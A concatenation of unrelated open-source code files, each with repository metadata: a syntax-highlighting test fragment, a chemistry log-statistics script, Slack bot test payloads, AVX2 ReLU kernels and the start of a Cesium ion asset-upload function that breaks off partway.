?<! : keyword.operator.lookbehind.negative.regexp, source.python, string.regexp.quoted.single.python
a : source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookbehind.negative.regexp, punctuation.parenthesis.lookbehind.begin.regexp, source.python, string.regexp.quoted.single.python
?<! : keyword.operator.lookbehind.negative.regexp, source.python, string.regexp.quoted.single.python
a : source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
return : keyword.control.flow.python, source.python
: source.python
some : source.python
| {
"repo_name": "MagicStack/MagicPython",
"path": "test/regexp/python10.py",
"copies": "1",
"size": "10248",
"license": "mit",
"hash": -3107929691211272700,
"line_mean": 74.9111111111,
"line_max": 162,
"alpha_frac": 0.6820843091,
"autogenerated": false,
"ratio": 3.9521789433089087,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 135
} |
# arg[1]: RMG log file from a run with QM with the "both" option
# arg[2]: 0 for "check"; 1 for "confirm"
if __name__ == "__main__":
import sys
#Example output:
#*****Attempt #5 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #6 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #7 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #8 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #9 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Final MOPAC attempt (#10) on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Trying to use Gaussian.
#*****Attempt #0 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#Attempt #1 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) succeeded.
#Point group: Cs
#Thermo for VLEXMQNIVAQEHV-UHFFFAOYAI: 48.57 112.68 41.61 54.59 66.16 75.82 90.6 101.25 117.34
#HBI-based thermo for OSUAYNIVCVOFCQ-UHFFFAOYATmult3(InChI=1/C10H12/c1-2-3-4-7-10-8-5-6-9-10/h2,7H,1,5-6,8-9H2/mult3): 115.97 106.43 39.2 51.65 62.64 71.73 85.48 95.24 110.3
#Attempt #1 on species DVGVDWBLASWERI-UHFFFAOYAM (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,10H,1,5-9H2) succeeded.
#Point group: C1
#Thermo for DVGVDWBLASWERI-UHFFFAOYAM: 39.96 104.61 40.87 54.22 66.0 75.78 90.65 101.32 117.41
#HBI-based thermo for OSUAYNIVCVOFCQ-UHFFFAOYATmult3(InChI=1/C10H12/c1-2-3-4-7-10-8-5-6-9-10/h2,7H,1,5-6,8-9H2/mult3): 119.26 109.4 39.5 50.54 60.7 69.44 82.99 92.81 108.53
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ an OpenBabel-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2). Will retry connectivity check with MoleCoor
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ a MoleCoor-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2).
#*****Attempt #1 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) failed. Will attempt a new keyword.
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ an OpenBabel-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2). Will retry connectivity check with MoleCoor
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ a MoleCoor-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2).
#*****Attempt #2 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) failed. Will attempt a new keyword.
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ an OpenBabel-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2). Will retry connectivity check with MoleCoor
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ a MoleCoor-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2).
#*****Attempt #3 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) failed. Will attempt a new keyword.
#Attempt #4 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) succeeded.
#Point group: C2v
#Thermo for CPGPQFYAGKHQTB-UHFFFAOYAZ: 127.6 67.2 18.37 24.32 29.54 33.86 40.39 45.06 52.1
# Number of retry keywords available for each QM backend; attempt numbers
# beyond MopacKeywords indicate the run switched from MOPAC to Gaussian.
# NOTE(review): assumes `sys` is imported earlier in the file -- confirm.
MopacKeywords = 10
GaussianKeywords = 36
if(int(sys.argv[2])==1):#0 for check, 1 for confirm
    confirm = True
else:
    confirm = False
#initialize counters
preexistMopac=0
preexistGaussian=0
preexistMopacList=[]
preexistGaussianList=[]
masterList=[]
connMismatchList=[]
connMismatchBackupFixList=[]
#per-attempt-number success histograms for each backend
newMopacArray=[0 for x in range(MopacKeywords)]
newGaussianArray=[0 for x in range(GaussianKeywords)]
newMopacConnFixArray=[0 for x in range(MopacKeywords)]
newGaussianConnFixArray=[0 for x in range(GaussianKeywords)]
newFail = 0 #note this does not necessarily correspond to newFailList length; it will increase due to repeated attempts on the same molecule
newFailList=[]
connMismatchSpeciesRetryList=[]
connMismatchFailList=[]
connMismatchBackupFixesEarlierFail=0
connMismatchBackupFixesOnFirstPrimaryFail=0
#read in the file
iin=open(sys.argv[1], 'r')
line = iin.readline()
# Main parse loop: walks the QMTP log line by line, classifying each species
# block as a new success (per attempt number), a complete failure, or a read
# of a pre-existing result, while tracking connectivity-mismatch diagnostics.
while line != '':#'' marks end of file
    #note: "***For species" should only be printed with check=confirm, so we don't need to check for that flag
    if ('Attempt #1' in line or (line.startswith('***For species'))):#the beginning of a block for a new attempt
        #print line
        connMismatchFlag=False
        #dontreadmore=False
        #begin block (****used three places****)
        if (line.startswith('***For species')):
            line = iin.readline()#read the next line to see whether the backup test failed also (in which case the next line would also start with '***For species'); otherwise, this should get to the attempt line or Warning line in the case of check
            if (not line.startswith('***For species')):#the case was fixed by the backup method
                inchikey = line.split()[2]
                if inchikey not in connMismatchBackupFixList:
                    connMismatchBackupFixList.append(inchikey)
                    if connMismatchFlag:
                        connMismatchBackupFixesEarlierFail=connMismatchBackupFixesEarlierFail+1
                    else:
                        connMismatchBackupFixesOnFirstPrimaryFail=connMismatchBackupFixesOnFirstPrimaryFail+1
                line = iin.readline()#read the next line...should be 'For species' (without ***)
            else:#else, the case was a genuine mismatch
                if (not connMismatchFlag):
                    inchikey = line.split()[2]
                    if inchikey not in connMismatchSpeciesRetryList: connMismatchSpeciesRetryList.append(inchikey)
                connMismatchFlag=True
                if not confirm:#read the next two lines to get to the Attempt line, (there will be a warning line)
                    line = iin.readline()
                    #at this point, line should contain the warning
                    if not line.startswith('Warning: Connectivity in quantum result for'):
                        print 'Algorithm error 0a:'+line
                    inchikey = line.split()[6]
                    if inchikey not in connMismatchList: connMismatchList.append(inchikey)
                    line = iin.readline()
                else:#read the next line to get to the Attempt line
                    line = iin.readline()
        #end block
        attemptCounter=1
        #at the end of here, line should contain "Attempt #1" (for confirm) (but only if there were no old (unconfirmed) files in QMfiles at the start of the run) or Pre-existing... or Attempt #1 (for check)
        if confirm:
            #read until the line contains "pre-existing successful" or "Attempt #1"
            while 'Attempt #1' not in line and not line.startswith('Pre-existing successful'):
                line = iin.readline()
        else:
            if 'Attempt #1' not in line and not line.startswith('Pre-existing successful'):
                print 'Algorithm error 1:'+ line
        if (line.startswith('Pre-existing successful')):#a pre-existing successful read (following an (at least partial) mismatch
            if (line.startswith('Pre-existing successful MOPAC')):
                preexistMopac=preexistMopac+1
                inchikey = line.split()[6]
                if inchikey not in preexistMopacList: preexistMopacList.append(inchikey)
                if inchikey not in masterList: masterList.append(inchikey)
            else:
                preexistGaussian=preexistGaussian+1
                inchikey = line.split()[5]
                if inchikey not in preexistGaussianList: preexistGaussianList.append(inchikey)
                if inchikey not in masterList: masterList.append(inchikey)
            line=iin.readline()
        else:#the Attempt #1 case
            while (not line.startswith('Attempt') and not line.startswith('*****Final attempt') and not line == ''):#this loop gets to the successful attempt or the last attempt, counting the number of intermediate failed attempts in the process
                line = iin.readline()
                #begin block
                if (line.startswith('***For species')):
                    line = iin.readline()#read the next line to see whether the backup test failed also (in which case the next line would also start with '***For species'); otherwise, this should get to the attempt line or Warning line in the case of check
                    if (not line.startswith('***For species')):#the case was fixed by the backup method
                        inchikey = line.split()[2]
                        if inchikey not in connMismatchBackupFixList:
                            connMismatchBackupFixList.append(inchikey)
                            if connMismatchFlag:
                                connMismatchBackupFixesEarlierFail=connMismatchBackupFixesEarlierFail+1
                            else:
                                connMismatchBackupFixesOnFirstPrimaryFail=connMismatchBackupFixesOnFirstPrimaryFail+1
                        line = iin.readline()#read the next line...should be 'For species' (without ***)
                    else:#else, the case was a genuine mismatch
                        if (not connMismatchFlag):
                            inchikey = line.split()[2]
                            if inchikey not in connMismatchSpeciesRetryList: connMismatchSpeciesRetryList.append(inchikey)
                        connMismatchFlag=True
                        if not confirm:#read the next two lines to get to the Attempt line, (there will be a warning line)
                            line = iin.readline()
                            #at this point, line should contain the warning
                            if not line.startswith('Warning: Connectivity in quantum result for'):
                                print 'Algorithm error 0b:'+line
                            inchikey = line.split()[6]
                            if inchikey not in connMismatchList: connMismatchList.append(inchikey)
                            line = iin.readline()
                        else:#read the next line to get to the Attempt line
                            line = iin.readline()
                    #at this point, line should contain the next attempt"#"
                    if '#' not in line:
                        print 'Algorithm error 2:'+line
                #end block
                while '#' not in line and line != '':#get to the next attempt line or "for species" line, ignoring, for example, imaginary frequencies warnings
                    line = iin.readline()
                    #begin block
                    if (line.startswith('***For species')):
                        line = iin.readline()#read the next line to see whether the backup test failed also (in which case the next line would also start with '***For species'); otherwise, this should get to the attempt line or Warning line in the case of check
                        if (not line.startswith('***For species')):#the case was fixed by the backup method
                            inchikey = line.split()[2]
                            if inchikey not in connMismatchBackupFixList:
                                connMismatchBackupFixList.append(inchikey)
                                if connMismatchFlag:
                                    connMismatchBackupFixesEarlierFail=connMismatchBackupFixesEarlierFail+1
                                else:
                                    connMismatchBackupFixesOnFirstPrimaryFail=connMismatchBackupFixesOnFirstPrimaryFail+1
                            line = iin.readline()#read the next line...should be 'For species' (without ***)
                        else:#else, the case was a genuine mismatch
                            if (not connMismatchFlag):
                                inchikey = line.split()[2]
                                if inchikey not in connMismatchSpeciesRetryList: connMismatchSpeciesRetryList.append(inchikey)
                            connMismatchFlag=True
                            if not confirm:#read the next two lines to get to the Attempt line, (there will be a warning line)
                                line = iin.readline()
                                #at this point, line should contain the warning
                                if not line.startswith('Warning: Connectivity in quantum result for'):
                                    print 'Algorithm error 0c:'+line
                                inchikey = line.split()[6]
                                if inchikey not in connMismatchList: connMismatchList.append(inchikey)
                                line = iin.readline()
                            else:#read the next line to get to the Attempt line
                                line = iin.readline()
                        #at this point, line should contain the next attempt"#"
                        if '#' not in line:
                            print 'Algorithm error 3:'+line
                    #end block
                attemptCounter=attemptCounter+1 #increment attempt# at each occurrence of #
            if (line.startswith('Attempt')):
                inchikey = line.split()[4]
                if inchikey not in masterList: masterList.append(inchikey)
                if attemptCounter > MopacKeywords :
                    newGaussianArray[attemptCounter-MopacKeywords -2] = newGaussianArray[attemptCounter-MopacKeywords -2]+1 # note we subtract 2 from the index rather than 1 since when the program switches to Gaussian, it prints an extra spurious attempt #0
                    if connMismatchFlag:
                        newGaussianConnFixArray[attemptCounter-MopacKeywords -2] = newGaussianConnFixArray[attemptCounter-MopacKeywords -2]+1
                else:
                    newMopacArray[attemptCounter-1] = newMopacArray[attemptCounter-1] + 1
                    if connMismatchFlag:
                        newMopacConnFixArray[attemptCounter-1] = newMopacConnFixArray[attemptCounter-1]+1
            elif(line != ''):#starts with '*****Final attempt'
                newFail = newFail+1
                inchikey = line.split()[5]
                if inchikey not in newFailList: newFailList.append(inchikey)
                if (connMismatchFlag):
                    if inchikey not in connMismatchFailList: connMismatchFailList.append(inchikey)
            line = iin.readline()
    elif (line.startswith('Pre-existing successful')):#a pre-existing successful read
        if (line.startswith('Pre-existing successful MOPAC')):
            preexistMopac=preexistMopac+1
            inchikey = line.split()[6]
            if inchikey not in preexistMopacList: preexistMopacList.append(inchikey)
            if inchikey not in masterList: masterList.append(inchikey)
        else:
            preexistGaussian=preexistGaussian+1
            inchikey = line.split()[5]
            if inchikey not in preexistGaussianList: preexistGaussianList.append(inchikey)
            if inchikey not in masterList: masterList.append(inchikey)
        line=iin.readline()
    else:
        line=iin.readline()
iin.close()
#print the results
print 'Number of species that completely failed QMTP = '+str(len(newFailList))
if confirm: print 'Number of the complete failures that were due to apparent connectivity mismatches (CheckConnectivity: confirm) = '+ str(len(connMismatchFailList))
if confirm: print 'Number of species that were retried due to apparent connectivity mismatches (CheckConnectivity: confirm) = '+str(len(connMismatchSpeciesRetryList))
if not confirm: print 'Number of unique species with connectivity warnings (CheckConnectivity: check) = '+str(len(connMismatchList))
print 'Number of cases where backup connectivity check identified a match missed by the primary method (early/late) = '+str(len(connMismatchBackupFixList))+' ('+str(connMismatchBackupFixesOnFirstPrimaryFail)+'/'+str(connMismatchBackupFixesEarlierFail)+')'#this could double-count for "check" case
print 'Number of reads of pre-existing successful MOPAC results = '+ str(preexistMopac)
print 'Number of reads of pre-existing successful Gaussian results = '+ str(preexistGaussian)
print 'Number of unique pre-existing MOPAC results read = '+ str(len(preexistMopacList))
print 'Number of unique pre-existing Gaussian results read = '+str(len(preexistGaussianList))
print 'Number of species that finally succeeded at each attempt #:'
newMopacTotal=0
newGaussianTotal=0
#failures exhaust every keyword for both backends, so they contribute all attempts
mopacTotalAttempts=newFail*MopacKeywords
gaussianTotalAttempts=newFail*GaussianKeywords
for i in range(len(newMopacArray)):
    print 'Attempt #'+str(i+1)+' (MOPAC) : '+str(newMopacArray[i])
    newMopacTotal = newMopacTotal + newMopacArray[i]
    mopacTotalAttempts = mopacTotalAttempts + (i+1)*newMopacArray[i]
for i in range(len(newGaussianArray)):
    print 'Attempt #'+str(i+1)+' (Gaussian) : '+str(newGaussianArray[i])
    newGaussianTotal = newGaussianTotal + newGaussianArray[i]
    gaussianTotalAttempts = gaussianTotalAttempts + (i+1)*newGaussianArray[i]
    #a Gaussian success implies all MOPAC keywords were tried first
    mopacTotalAttempts = mopacTotalAttempts + MopacKeywords*newGaussianArray[i]
if confirm:
    print 'Number of species with connectivity apparently fixed at each attempt #:'
    for i in range(len(newMopacConnFixArray)):
        print 'Attempt #'+str(i+1)+' (MOPAC) : '+str(newMopacConnFixArray[i])
    for i in range(len(newGaussianConnFixArray)):
        print 'Attempt #'+str(i+1)+' (Gaussian) : '+str(newGaussianConnFixArray[i])
print 'Number of species with new successful MOPAC results = ' + str(newMopacTotal)
print 'Number of species with new successful Gaussian results = ' + str(newGaussianTotal)
print 'Number of MOPAC attempts = ' + str(mopacTotalAttempts) #this will only include all "sets" of failures for the molecule (i.e. if the molecule is encountered again and retried, this will also be counted)
print 'Number of Gaussian attempts = ' + str(gaussianTotalAttempts)#this will only include all "sets" of failures for the molecule (i.e. if the molecule is encountered again and retried, this will also be counted)
print 'Total number of unique species with QMTP results (pre-existing and/or new) = ' + str(len(masterList))
"repo_name": "enochd/RMG-Java",
"path": "scripts/QMTPstats.py",
"copies": "11",
"size": "17345",
"license": "mit",
"hash": -7447140406291198000,
"line_mean": 65.972972973,
"line_max": 297,
"alpha_frac": 0.7289132315,
"autogenerated": false,
"ratio": 2.9669859733150874,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9195899204815088,
"avg_score": null,
"num_lines": null
} |
# Canned Slack slash-command payloads used as test fixtures. All payloads
# share the same team/channel/user fields and differ only in the command,
# its text, and its parsed args, so they are built by a single helper.


def _payload(bot, text, args=None):
    """Return a slash-command payload for *bot* with the given text/args.

    By default ``args`` mirrors ``text``; pass it explicitly when the two
    differ (e.g. the built-in ``help`` subcommand).
    """
    if args is None:
        args = text
    return {"token": "slacktoken123",
            "team_id": "team123",
            "team_domain": "teamdomain",
            "channel_id": "channelid",
            "channel_name": "directmes1N8L",
            "user_name": "derp",
            "command": "/" + bot,
            "subcommand": bot,
            "args": args,
            "text": text}


arg_bot_with_arg = _payload("arg_bot", "derp")

arg_bot_with_no_args = _payload("arg_bot", "")

no_arg_bot_without_arg = _payload("no_arg_bot", "")

no_arg_bot_with_arg = _payload("no_arg_bot", "arg1")

optional_arg_bot_with_optional_arg = _payload("optional_arg_bot", "optional=derp")

optional_arg_bot_with_no_arg = _payload("optional_arg_bot", "")

two_message_bot = _payload("two_message_bot", "")

help_subcommand = _payload("no_arg_bot", "help", args="")
| {
"repo_name": "forter/boten",
"path": "test/payloads.py",
"copies": "1",
"size": "3973",
"license": "apache-2.0",
"hash": 2343321549951832600,
"line_mean": 44.6666666667,
"line_max": 71,
"alpha_frac": 0.3470928769,
"autogenerated": false,
"ratio": 4.5353881278538815,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.5382481004753882,
"avg_score": null,
"num_lines": null
} |
# Leaky-ReLU forward pass over a float32 buffer (PeachPy AVX2 codegen):
# output[i] = input[i] if input[i] >= 0 else input[i] * negative_slope
arg_input = Argument(ptr(const_float_), "input")
arg_output = Argument(ptr(float_), "output")
arg_length = Argument(size_t, "length")
arg_negative_slope = Argument(float_, "negative_slope")
with Function("nnp_relu__avx2",
              (arg_input, arg_output, arg_length, arg_negative_slope),
              target=uarch.default + isa.avx2):
    reg_input = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_input, arg_input)

    reg_output = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_output, arg_output)

    reg_length = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_length, arg_length)

    # Broadcast the scalar slope across all 8 lanes of a YMM register
    ymm_negative_slope = YMMRegister()
    LOAD.ARGUMENT(ymm_negative_slope.as_xmm, arg_negative_slope)
    VBROADCASTSS(ymm_negative_slope, ymm_negative_slope.as_xmm)

    loop = Loop()
    TEST(reg_length, reg_length)
    JZ(loop.end)  # skip the loop entirely when length == 0
    with loop:
        # Load (unaligned!) data and update input pointer
        ymm_data = YMMRegister()
        VMOVUPS(ymm_data, [reg_input])
        ADD(reg_input, YMMRegister.size)

        # Scale data with negative slope (for negative inputs)
        ymm_scaled_data = YMMRegister()
        VMULPS(ymm_scaled_data, ymm_data, ymm_negative_slope)

        # Select scaled data if input is negative (VBLENDVPS picks the
        # scaled lane wherever the mask operand's sign bit is set; the
        # mask here is the input itself)
        VBLENDVPS(ymm_data, ymm_data, ymm_scaled_data, ymm_data)

        # Stream (aligned!) data to memory and update output pointer
        VMOVNTPS([reg_output], ymm_data)
        ADD(reg_output, YMMRegister.size)

        # NOTE(review): length appears to be assumed a multiple of
        # 8 floats (one YMM register) -- confirm with callers.
        SUB(reg_length, YMMRegister.size // float_.size)
        JNZ(loop.begin)

    RETURN()
# In-place leaky-ReLU over a float32 buffer (PeachPy AVX2 codegen):
# data[i] = data[i] if data[i] >= 0 else data[i] * negative_slope
arg_data = Argument(ptr(float_), "data")
arg_length = Argument(size_t, "length")
arg_negative_slope = Argument(float_, "negative_slope")
with Function("nnp_inplace_relu__avx2",
              (arg_data, arg_length, arg_negative_slope),
              target=uarch.default + isa.avx2):
    reg_data = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_data, arg_data)

    reg_length = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_length, arg_length)

    # Broadcast the scalar slope across all 8 lanes of a YMM register
    ymm_negative_slope = YMMRegister()
    LOAD.ARGUMENT(ymm_negative_slope.as_xmm, arg_negative_slope)
    VBROADCASTSS(ymm_negative_slope, ymm_negative_slope.as_xmm)

    loop = Loop()
    TEST(reg_length, reg_length)
    JZ(loop.end)  # skip the loop entirely when length == 0
    with loop:
        # Load data (aligned load: the in-place buffer is expected to be
        # 32-byte aligned, unlike the forward kernel's input)
        ymm_data = YMMRegister()
        VMOVAPS(ymm_data, [reg_data])

        # Scale data with negative slope (for negative inputs)
        ymm_scaled_data = YMMRegister()
        VMULPS(ymm_scaled_data, ymm_data, ymm_negative_slope)

        # Select scaled data if input is negative
        VBLENDVPS(ymm_data, ymm_data, ymm_scaled_data, ymm_data)

        # Store data back to the same location and update pointer
        VMOVAPS([reg_data], ymm_data)
        ADD(reg_data, YMMRegister.size)

        SUB(reg_length, YMMRegister.size // float_.size)
        JNZ(loop.begin)

    RETURN()
# Leaky-ReLU backward pass (PeachPy AVX2 codegen):
# input_gradient[i] = output_gradient[i] if input[i] >= 0
#                     else output_gradient[i] * negative_slope
arg_output_gradient = Argument(ptr(const_float_), "output_gradient")
arg_input = Argument(ptr(const_float_), "input")
arg_input_gradient = Argument(ptr(float_), "input_gradient")
arg_length = Argument(size_t, "length")
arg_negative_slope = Argument(float_, "negative_slope")
with Function("nnp_grad_relu__avx2",
              (arg_output_gradient, arg_input, arg_input_gradient, arg_length, arg_negative_slope),
              target=uarch.default + isa.avx2):
    reg_output_gradient = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_output_gradient, arg_output_gradient)

    reg_input = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_input, arg_input)

    reg_input_gradient = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_input_gradient, arg_input_gradient)

    reg_length = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_length, arg_length)

    # Broadcast the scalar slope across all 8 lanes of a YMM register
    ymm_negative_slope = YMMRegister()
    LOAD.ARGUMENT(ymm_negative_slope.as_xmm, arg_negative_slope)
    VBROADCASTSS(ymm_negative_slope, ymm_negative_slope.as_xmm)

    loop = Loop()
    TEST(reg_length, reg_length)
    JZ(loop.end)  # skip the loop entirely when length == 0
    with loop:
        # Load (unaligned!) gradient and update output gradient pointer
        ymm_gradient = YMMRegister()
        VMOVUPS(ymm_gradient, [reg_output_gradient])
        ADD(reg_output_gradient, YMMRegister.size)

        # Load (unaligned!) data and update input pointer
        ymm_data = YMMRegister()
        VMOVUPS(ymm_data, [reg_input])
        ADD(reg_input, YMMRegister.size)

        # Scale gradient with negative slope (for negative inputs)
        ymm_scaled_gradient = YMMRegister()
        VMULPS(ymm_scaled_gradient, ymm_gradient, ymm_negative_slope)

        # Select scaled gradient if the *input* is negative (the forward
        # input provides the blend mask via its sign bit)
        VBLENDVPS(ymm_gradient, ymm_gradient, ymm_scaled_gradient, ymm_data)

        # Store (aligned!) gradient to memory and update input gradient
        # pointer (VMOVAPS is a plain aligned store, not a streaming store)
        VMOVAPS([reg_input_gradient], ymm_gradient)
        ADD(reg_input_gradient, YMMRegister.size)

        SUB(reg_length, YMMRegister.size // float_.size)
        JNZ(loop.begin)

    RETURN()
| {
"repo_name": "microblink/NNPACK",
"path": "src/x86_64-fma/relu.py",
"copies": "3",
"size": "4493",
"license": "bsd-2-clause",
"hash": 3945685513883665000,
"line_mean": 29.7739726027,
"line_max": 86,
"alpha_frac": 0.7360338304,
"autogenerated": false,
"ratio": 2.847275031685678,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5083308862085678,
"avg_score": null,
"num_lines": null
} |
# Arg order is very important for task deconstruction.
# If order is changed make sure that the refresh API call is updated
def upload_to_ion(
    task_id,
    asset_type,
    token,
    asset_path,
    name,
    description="",
    attribution="",
    options=None,
):
    """Upload a task asset to Cesium ion and poll until processing finishes.

    Runs as a deconstructed task: every import is deferred into the function
    body so the callable can be serialized and executed by the task runner.
    Progress and errors are persisted via ``set_asset_info`` so the UI can
    track the upload and the ion-side processing.

    :param task_id: id of the WebODM task the asset belongs to
    :param asset_type: name of an ``AssetType`` enum member
    :param token: Cesium ion API bearer token
    :param asset_path: local filesystem path of the file to upload
    :param name: asset name shown in ion
    :param description: optional asset description
    :param attribution: optional attribution string
    :param options: optional dict of extra ion source options
        (``None`` -- not ``{}`` -- to avoid the shared mutable default pitfall)
    """
    import sys
    import time
    import logging
    import requests
    from os import path
    from shutil import rmtree
    from app.plugins import logger
    from .api_views import (
        get_asset_info,
        set_asset_info,
        AssetType,
        ASSET_TO_OUTPUT,
        ASSET_TO_SOURCE,
        ASSET_TO_FILE,
        pluck,
    )
    from .model_tools import (
        to_ion_texture_model,
        IonInvalidZip,
    )
    from .globals import ION_API_URL

    if options is None:
        options = {}

    class LoggerAdapter(logging.LoggerAdapter):
        """Prefixes every log message with the task/asset identifier."""

        def __init__(self, prefix, logger):
            super().__init__(logger, {})
            self.prefix = prefix

        def process(self, msg, kwargs):
            return "[%s] %s" % (self.prefix, msg), kwargs

    class TaskUploadProgress(object):
        """boto3 upload callback that persists upload progress to asset info."""

        def __init__(self, file_path, task_id, asset_type, logger=None, log_step_size=0.05):
            self._task_id = task_id
            self._asset_type = asset_type
            self._logger = logger

            self._uploaded_bytes = 0
            self._total_bytes = float(path.getsize(file_path))
            self._asset_info = get_asset_info(task_id, asset_type)

            self._last_log = 0
            self._log_step_size = log_step_size

        @property
        def asset_info(self):
            return self._asset_info

        def __call__(self, total_bytes):
            # boto3 reports incremental byte counts, not running totals
            self._uploaded_bytes += total_bytes
            progress = self._uploaded_bytes / self._total_bytes
            self._asset_info["upload"]["progress"] = progress

            # Log at most once per log_step_size fraction of the file
            if self._logger is not None and progress - self._last_log > self._log_step_size:
                self._logger.info(f"Upload progress: {progress * 100}%")
                self._last_log = progress

            set_asset_info(self._task_id, self._asset_type, self._asset_info)

    asset_logger = LoggerAdapter(prefix=f"Task {task_id} {asset_type}", logger=logger)
    asset_type = AssetType[asset_type]
    asset_info = get_asset_info(task_id, asset_type)
    del_directory = None

    # boto3 is an optional dependency; install it on the fly when missing
    try:
        import boto3
    except ImportError:
        import subprocess

        asset_logger.info(f"Manually installing boto3...")
        subprocess.call([sys.executable, "-m", "pip", "install", "boto3"])
        import boto3

    try:
        # Textured models must be repackaged before ion accepts them;
        # fall back to the original file on any conversion failure.
        if asset_type == AssetType.TEXTURED_MODEL:
            try:
                asset_path, del_directory = to_ion_texture_model(asset_path)
                logger.info("Created ion texture model!")
            except IonInvalidZip as e:
                logger.info("Non geo-referenced texture model, using default file.")
            except Exception as e:
                logger.warning("Failed to convert to ion texture model")
                logger.warning(e)

        headers = {"Authorization": f"Bearer {token}"}
        data = {
            "name": name,
            "description": description,
            "attribution": attribution,
            "type": ASSET_TO_OUTPUT[asset_type],
            "options": {**options, "sourceType": ASSET_TO_SOURCE[asset_type]},
        }

        # Create Asset Request
        asset_logger.info(f"Creating asset of type {asset_type}")
        res = requests.post(f"{ION_API_URL}/assets", json=data, headers=headers)
        res.raise_for_status()
        ion_info, upload_meta, on_complete = pluck(
            res.json(), "assetMetadata", "uploadLocation", "onComplete"
        )
        ion_id = ion_info["id"]
        # NOTE: the AWS session token is distinct from the ion API `token`
        # parameter above; it gets its own name so `headers` stays valid.
        access_key, secret_key, session_token, endpoint, bucket, file_prefix = pluck(
            upload_meta,
            "accessKey",
            "secretAccessKey",
            "sessionToken",
            "endpoint",
            "bucket",
            "prefix",
        )

        # Upload
        asset_logger.info("Starting upload")
        upload_stats = TaskUploadProgress(asset_path, task_id, asset_type, asset_logger)
